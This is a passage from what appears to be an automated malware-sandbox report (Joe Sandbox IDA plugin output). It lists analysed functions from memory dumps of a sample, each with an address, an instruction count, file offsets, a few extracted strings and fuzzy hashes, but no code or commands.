                                      • Instruction ID: f11a3c43f7071637eee7ca900e5a0aac694fe5df441056af166600104767026b
                                      • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction Fuzzy Hash: EDE1C432A083019FCB24EE18C8817AEB7E6EFC5314F15892DE9999B351D730EC45EB46
                                      Function 00F7E258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: UNC\
                                      • API String ID: 0-505053535
                                      • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction ID: b6ba756911f0e19131af8c8c18e433b57dd9d20a868e4cfd1ae1544226615c81
                                      • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction Fuzzy Hash: 4FE10C71D042658EEB10CF18C8843BEBBE2AB8D324F19C1E7D49C5B291D7358D46EB92
                                      Function 0128F9CE Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: }Nd
                                      • API String ID: 0-922026929
                                      • Opcode ID: ab5bf9d7c4b72f8f4c701463ffa148b0a039351de0add8c80ec3efc4ae7f7d8d
                                      • Instruction ID: 5b90869f0a037ba4c9022ed61b5619a656294922e3e7e7b8e916bd92b4942b03
                                      • Opcode Fuzzy Hash: ab5bf9d7c4b72f8f4c701463ffa148b0a039351de0add8c80ec3efc4ae7f7d8d
                                      • Instruction Fuzzy Hash: 3F7149F390C314AFE310AA2DDC8476BB7D9EBD4364F2A863CEA84D3744E43949018296
                                      Function 00F3E544 Relevance: .8, Instructions: 823COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                      • Instruction ID: 376d5e0f914c6d387f7f9debdb7ea1896463c1c2f728deafc15556c429f2b605
                                      • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                      • Instruction Fuzzy Hash: BF8201B5900F448FD765CF29C880B92BBE1BF8A310F548A2ED9EA8B751DB30B545DB50
                                      Function 00F58E78 Relevance: .6, Instructions: 649COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                      • Instruction ID: 1127a9cb2dab3c4700c16e55ca488052630ae8103b69b54f548ab5fb6a2800e4
                                      • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                      • Instruction Fuzzy Hash: 8A42A471608741CFC729CF19C090765BBE2BF45312F28896DCE868B791D6B5E88DEB50
                                      Function 00F8AC28 Relevance: .5, Instructions: 501COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                      • Instruction ID: 888cd307ac49372fc8c9d6217f387d03977bc861c7d45dd9873085ecc328a0c4
                                      • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                      • Instruction Fuzzy Hash: 7802F472E002168FDB11DF29C8807EFB7E2EF9A354F15832AE815B7251D770AD429790
                                      Function 00F698B8 Relevance: .5, Instructions: 482COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                      • Instruction ID: e88a0de81ebd2be84bd92fcd9593a890b0afe0cca2bb996e478373b8adec6d14
                                      • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                      • Instruction Fuzzy Hash: CC02F171A0C3058FDB15CF29C880369B7E9EFA5350F14872DE89997362D7B1E885EB41
                                      Function 00F566C8 Relevance: .4, Instructions: 418COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                      • Instruction ID: 28b89751ef4b93918d7484eff23c386cffd2c0223b982117d245417ad1ef43c3
                                      • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                      • Instruction Fuzzy Hash: 7EF17AA260C6914BC70D9A1498B08BD7FD25BA9201F4E86ADFDD70F383D924DA05EB61
                                      Function 00F9B308 Relevance: .4, Instructions: 415COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                      • Instruction ID: 53bbfcaa464af598bb1484b69ceee82debbb2094abfd7dff069509f5302cd4a7
                                      • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                      • Instruction Fuzzy Hash: 95D18673F10A254BFB08CA99DC913ADB6E2EBD8350F19423ED916F7381D6B89D018790
                                      Function 00F80B88 Relevance: .4, Instructions: 378COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                      • Instruction ID: 36f861ddeb8d41b2a845c088c5fc3017acdd80f6969c7d69f800c518735ed0c2
                                      • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                      • Instruction Fuzzy Hash: 2DD10572E002198BDF649F98C8807EEB7B1FF49320F548229E925B7291DB34594AEB40
                                      Function 00F6B8A8 Relevance: .4, Instructions: 376COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                      • Instruction ID: 6a429a249e2c8ab67d291254deddeb859a81cba8ee4ae6e19f047e0fbb6de8c3
                                      • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                      • Instruction Fuzzy Hash: 7B027A74E006598FCF26CFA8C4905EDBBB6FF8D310F548159E899AB355C730AA91CB90
                                      Function 00F6BD68 Relevance: .4, Instructions: 372COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                      • Instruction ID: 2d1256e43cdf4e1179d6ddde9427b7c9ae02da61201ecbb68f0cf8311e2dac42
                                      • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                      • Instruction Fuzzy Hash: 8C022475E00619DFCF15CF98C8809ADB7B6FF88350F25816AE849AB351D731AA91CF90
                                      Function 00F8A648 Relevance: .3, Instructions: 339COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                      • Instruction ID: 972976f25f179547547eae606ed93cc68d1b738b6b2daf6ab82395ac530db092
                                      • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                      • Instruction Fuzzy Hash: A9C15C76E29B814BE713973DD8022A5F395AFE7290F15D72FFCE472942EB2096819304
                                      Function 00F7AD38 Relevance: .3, Instructions: 302COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
